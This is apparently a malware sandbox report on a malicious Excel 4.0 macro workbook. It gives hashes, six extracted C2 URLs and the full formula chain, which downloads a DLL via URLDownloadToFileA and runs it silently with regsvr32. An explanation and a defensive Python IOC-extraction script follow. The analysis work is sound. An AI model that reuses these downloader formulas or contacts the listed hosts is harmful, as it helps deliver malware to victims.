General

  • Target

    e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7

  • Size

    40KB

  • MD5

    8554766a2935ba1537f9c6abf54e8125

  • SHA1

    e26e44a2a22255fdb909440e514485eec29a0841

  • SHA256

    e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7

  • SHA512

    931f1b491811ed6ff130664abea6572427031be6aaaa9951fb19733f9574ced28cbc5a09e402ef1267af2e7a93ace747c1abbbb01e5fa3d0d3167513db41e2ad

  • SSDEEP

    768:0PnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:qnC5iymTylND59V4jwmXc2XFy

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/

http://totalplaytuxtla.com/sitio/tEMOwWRh/

http://meca-global.com/wp-admin/zpM6L8KXY0H/

http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/

http://51.222.72.232/wp-includes/3ztqctcYr/

http://51.222.72.233/wp-includes/Xi60QX9khe/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0)
    =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx")
    =RETURN()
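
The formula chain above is a classic XLM downloader: each CALL invokes urlmon!URLDownloadToFileA with the type string "JJCCBB" (a signed 32-bit return value, then the pCaller, URL, file name, dwReserved and callback arguments), so the HRESULT comes back as a signed integer and a failure code (high bit set) reads as negative. Each following =IF('EFEGVE'!F..<0, ...) therefore only tries the next URL when the previous download failed, =IF('EFEGVE'!F22<0,CLOSE(0),) gives up if all six failed, and =EXEC runs regsvr32.exe -s on the dropped file, which silently loads the DLL (named .ocx) and calls its DllRegisterServer export. The path ..\xda.ocx is relative to Excel's working directory at the time the macro runs.

The following is an added example, not part of the sandbox report or its tooling: a small Python parser that walks such formulas, splits CALL/IF/EXEC argument lists while respecting quoted strings and nested calls, and pulls out the URLs, drop path, API calls and execution command as a structured IOC set. The input list FORMULAS is the chain from this report, entered one formula per string; the sheet name EFEGVE and the cell references are taken from the report as-is.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the formula chain from the report above, split into
# one formula per string (the report prints them on a single line).
FORMULAS = [
    r'''=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0)''',
    r'''=IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0))''',
    r'''=IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0))''',
    r'''=IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0))''',
    r'''=IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0))''',
    r'''=IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0))''',
    r'''=IF('EFEGVE'!F22<0,CLOSE(0),)''',
    r'''=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx")''',
    r'''=RETURN()''',
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def split_args(text, open_paren):
    """Split the argument list of the call whose '(' is at text[open_paren].

    Returns (args, index_of_closing_paren). Commas inside quoted strings or
    nested calls do not split, and the raw text (quotes included) is kept so a
    nested CALL(...) argument can be parsed again by the same routine.
    """
    if text[open_paren] != "(":
        raise ValueError("expected '(' at offset %d" % open_paren)
    args, cur, depth, in_str = [], [], 0, False
    for i in range(open_paren, len(text)):
        ch = text[i]
        if in_str:
            cur.append(ch)
            if ch == '"':  # a doubled "" inside a string toggles twice; harmless for raw text
                in_str = False
        elif ch == '"':
            in_str = True
            cur.append(ch)
        elif ch == "(":
            depth += 1
            if depth > 1:
                cur.append(ch)
        elif ch == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(cur).strip())
                return args, i
            cur.append(ch)
        elif ch == "," and depth == 1:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    raise ValueError("unbalanced parentheses in formula")


def find_invocations(formula, name):
    """Argument lists of every NAME(...) in the formula, nested occurrences included."""
    return [split_args(formula, m.end() - 1)[0]
            for m in re.finditer(r"\b%s\(" % re.escape(name), formula)]


def unquote(token):
    """Strip the surrounding quotes of an XLM string literal, un-doubling embedded quotes."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1].replace('""', '"')
    return token


@dataclass
class XlmIocs:
    urls: list = field(default_factory=list)
    drop_paths: list = field(default_factory=list)
    api_calls: list = field(default_factory=list)      # (dll, function) pairs
    exec_commands: list = field(default_factory=list)
    conditions: list = field(default_factory=list)     # IF(...) conditions, e.g. 'EFEGVE'!F12<0


def extract_iocs(formulas):
    """Walk a list of XLM formulas and collect the network and execution indicators."""
    iocs = XlmIocs()
    for formula in formulas:
        for args in find_invocations(formula, "CALL"):
            if len(args) < 3:
                continue
            dll, func, _types = (unquote(a) for a in args[:3])
            iocs.api_calls.append((dll.lower(), func))
            rest = [unquote(a) for a in args[3:]]
            if func.lower().startswith("urldownloadtofile") and len(rest) >= 3:
                # URLDownloadToFile(pCaller, szURL, szFileName, dwReserved, lpfnCB)
                iocs.urls.append(rest[1])
                iocs.drop_paths.append(rest[2])
            else:
                for a in rest:
                    iocs.urls.extend(URL_RE.findall(a))
        for args in find_invocations(formula, "EXEC"):
            if args:
                iocs.exec_commands.append(unquote(args[0]))
        for args in find_invocations(formula, "IF"):
            if args:
                iocs.conditions.append(args[0])
    # De-duplicate while keeping first-seen order (the drop path repeats six times).
    for name in ("urls", "drop_paths", "api_calls", "exec_commands", "conditions"):
        setattr(iocs, name, list(dict.fromkeys(getattr(iocs, name))))
    return iocs


def summarize(iocs):
    """Turn the extracted IOCs into the behavioural findings an analyst would note."""
    findings = []
    if any(func.lower().startswith("urldownloadtofile") for _, func in iocs.api_calls):
        findings.append("downloads a payload with urlmon!URLDownloadToFile")
    if len(iocs.urls) > 1 and iocs.conditions:
        findings.append("%d stage URLs tried in turn; each IF(...<0) checks the previous HRESULT"
                        % len(iocs.urls))
    for cmd in iocs.exec_commands:
        low = cmd.lower()
        if "regsvr32" in low and any(p.lower() in low for p in iocs.drop_paths):
            findings.append("executes the dropped file via regsvr32 (DllRegisterServer)")
    return findings


if __name__ == "__main__":
    result = extract_iocs(FORMULAS)
    for url in result.urls:
        print("url      ", url)
    print("drop path", result.drop_paths)
    print("exec     ", result.exec_commands)
    for line in summarize(result):
        print("finding  ", line)
```

The same splitter handles the usual evasions in this family (the CALL buried inside IF, a FORMULA() that writes the next cell, commas inside URLs), because it tracks quote state and parenthesis depth instead of splitting on commas. On real samples run it over the formulas recovered by an XLM extractor such as olevba or XLMMacroDeobfuscator rather than on the report text, since the sheet cells are often built at run time and the static text alone may not contain the final URL.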

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with Excel 4.0 (XLM) macros.

Files

  • e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7
    .xlsm office2007